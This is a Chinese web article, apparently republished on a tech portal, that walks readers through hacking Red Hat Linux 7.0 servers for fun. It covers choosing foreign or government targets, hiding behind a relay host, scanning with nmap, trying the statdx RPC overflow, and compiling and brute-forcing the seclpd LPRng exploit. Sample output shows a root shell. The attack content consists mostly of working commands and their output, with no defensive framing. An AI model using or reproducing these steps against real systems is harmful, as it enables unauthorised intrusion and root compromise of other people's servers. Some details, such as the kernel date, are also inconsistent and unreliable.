步步入侵REDHAT LINUX7.0

系统 Linux
WINDOWS2000、NT是不是不想“玩”了,快跟我一步步入侵REDHAT LINUX7.0吧!

WINDOWS2000、NT是不是不想“玩”了,快跟我一步步入侵REDHAT LINUX7.0吧!

[一. 确定目标]

日本?台湾?美国?随便你了!

[二.试试他的服务都有些什么]

比如TELNET 或是 FTP等等,你会得到一些系统信息的!

[三.找跳板]

当然也是REDHAT LINUX7.0的了,最好是你自已的,方便嘛!

命令行:

C:\>telnet xxx.xxx.xxx.xxx

登陆上去了吧!

[四.用扫描器看看]

这里我们推荐使用NMAP,因为在UNIX系统中它够爽,输入以下命令:

bash-2.04$(这是系统提示状态) nmap -sT -0 www.xxx.gov(你先前选定的目标)

是不是开了很多端口呀

[五.利用LP(网络打印服务)漏洞入侵]

重点来了!在REDHAT 7.0中有个LP漏洞(其实我们通过上面的扫描结果后也可以试试

RPC漏洞 例如:bash-2.04$ finger @www.xxx.gov 查看用户

bash-2.04$ ./statdx -h 其中statd为rpc.ststd是一个程式需下载

查看系统支持版本

bash-2.04$ stat -d 0 www.xxx.gov 进行溢出)

呵呵,跑题了!

我们需要下载一个SECLPD.C程序,然后将这个程序上传到你的跳板上

用GCC编译一下,输入命令

bash-2.04$ gcc -o seclpd seclpd.c

编译成功后,执行看看命令的使用:

bash-2.04$ ./seclpd

看来就是它了,没有错.开始入侵

输入命令

bash-2.04$ ./seclpd www.xxx.gov -t 0

结果显示失败,在来

bash-2.04$ ./seclpd www.xxx.gov -t 1

又失败,我在来

bash-2.04$ ./seclpd www.xxx.gov brute -t 0 我加BRUTE,暴力,哈哈~

结果不在显示TRY BRUTE FORCE了,是一直想要的RELAX AND ENJOY THE RIDE;>

现在要等它看出不出SHELL,大约五分钟左右,就会有结果出来

- [+] shell located on www.xxx.gov

- [+] enter commands at will

linux xxx.www 2.2.16-22smp #1 smp tue aug 22 17:34:21 edt 2002 i686

unknown

uid=(0)(root) gid=7(lp)

我笑,我大声地笑,我是ROOT了!

【编辑推荐】

  1. RHEL 5系统下故障处理方法
  2. 建立RHEL 5.0下版本控制服务器
  3. RHEL5配置gdm让远程机器登录X window
责任编辑:赵宁宁 来源: 中国IT实验室
相关推荐

2010-09-13 17:35:11

2009-09-08 10:44:51

2009-07-24 09:11:02

Linux体积Linux命令行Linux安装

2011-08-23 17:26:41

2013-05-07 10:34:27

Debian Linu

2013-12-13 10:12:04

DHCPRedHat 配置

2009-07-03 18:27:03

redhatlinux安全使用

2013-05-15 22:17:13

DebianDebian Linu

2021-04-25 09:25:25

Linux手工排查

2011-03-09 09:25:53

RedHatLinuxLAMP

2010-03-10 14:35:43

2013-05-15 22:30:49

DebianDebian LinuUbuntu

2009-09-04 10:21:00

2011-01-05 16:19:34

2020-12-24 09:46:07

Linux命令服务器

2009-10-23 10:05:36

2013-01-15 10:18:06

云计算云理念实践医药行业

2009-08-07 10:05:53

2009-11-17 10:41:28

2010-01-07 14:39:37

Linux配置远程桌面
点赞
收藏

51CTO技术栈公众号